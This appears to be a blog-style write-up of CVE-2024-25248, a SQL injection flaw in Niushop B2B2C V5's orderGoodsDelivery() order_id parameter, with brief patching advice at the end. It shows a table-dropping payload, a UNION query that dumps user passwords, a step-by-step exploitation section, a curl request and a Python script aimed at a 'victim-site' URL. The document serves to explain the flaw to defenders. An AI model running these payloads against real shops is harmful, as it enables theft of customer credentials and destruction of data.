CVE-2024-25248 - Easy SQL Injection in Niushop B2B2C V5’s orderGoodsDelivery() – How Attackers Exploit It

Niushop B2B2C is a popular open-source e-commerce platform, especially in Chinese markets. In February 2024, a serious vulnerability—CVE-2024-25248—was found in Niushop V5. This issue is caused by an unsafe function called orderGoodsDelivery(), which makes it possible for hackers to run almost any SQL command they want by tampering with a single parameter: order_id. Let’s break down what that means, how dangerous it really is, and how attackers exploit it in the real world.

What’s CVE-2024-25248?

CVE-2024-25248 is a SQL Injection vulnerability. If you’re new to the term, SQL Injection is when an attacker puts special text into an application's input fields, tricking the app into running malicious database commands.

In this case:
The vulnerability affects the orderGoodsDelivery() function in Niushop B2B2C V5, specifically via the order_id parameter.

*Attackers don’t need to have an account or any special access*—they just need to reach the vulnerable endpoint and insert some clever text in the right place.

The orderGoodsDelivery() function may look like this (simplified)

public function orderGoodsDelivery() {
    $order_id = $_GET['order_id'];
    $query = "SELECT * FROM orders WHERE order_id = $order_id";
    $result = $db->query($query);
    // ... more logic
}

Problem:
The $order_id variable is taken straight from user input and plugged into an SQL query with no checking or escaping. If you provide order_id=99999, it’ll fetch the order like normal.

But what if you send this instead?

order_id=99999 OR 1=1

Now the query becomes

SELECT * FROM orders WHERE order_id = 99999 OR 1=1

This always returns all rows because 1=1 is always true!

Attackers can go further, adding more dangerous commands. For example

order_id=; DROP TABLE users; --

So the executed query becomes

SELECT * FROM orders WHERE order_id = ; DROP TABLE users; -- 

Now, if the database allows running multiple commands, this could delete the entire user table!

Exploiting CVE-2024-25248: Step-By-Step

Step 1: Find the vulnerable endpoint.

Usually something like:

  http://[target-site]/index.php?c=order&a=orderGoodsDelivery&order_id=[payload]
  

Step 2: Craft a malicious order_id value, like

1 OR 1=1

Or to dump sensitive info (example for MySQL)

1 UNION SELECT user(),password,3,4 FROM niushop_user

Step 3: Send the request in a browser or with a tool like curl

curl "http://victim-site.com/index.php?c=order&a=orderGoodsDelivery&order_id=1%20OR%201=1";

Step 4: Look for dumped data, errors, or signs that the site is leaking info.

Here’s a Python script demonstrating a UNION-based attack

import requests

url = "http://victim-site.com/index.php";
payload = "1 UNION SELECT user(),password FROM niushop_user"

params = {
    "c": "order",
    "a": "orderGoodsDelivery",
    "order_id": payload
}

response = requests.get(url, params=params)
print(response.text)

References

- CVE-2024-25248 on NIST
- GitHub issue discussing the Niushop V5 vulnerability
- Niushop official site
- OWASP SQL Injection Overview

Final Thoughts

*SQL Injection bugs like CVE-2024-25248 are among the oldest but still the most dangerous web app weaknesses.* If you use Niushop, update today—and if you write PHP code, never build SQL queries by putting variables directly into your SQL!

Stay safe—don’t let your site become another easy target.

Timeline

Published on: 02/26/2024 22:15:07 UTC
Last modified on: 02/14/2025 16:22:09 UTC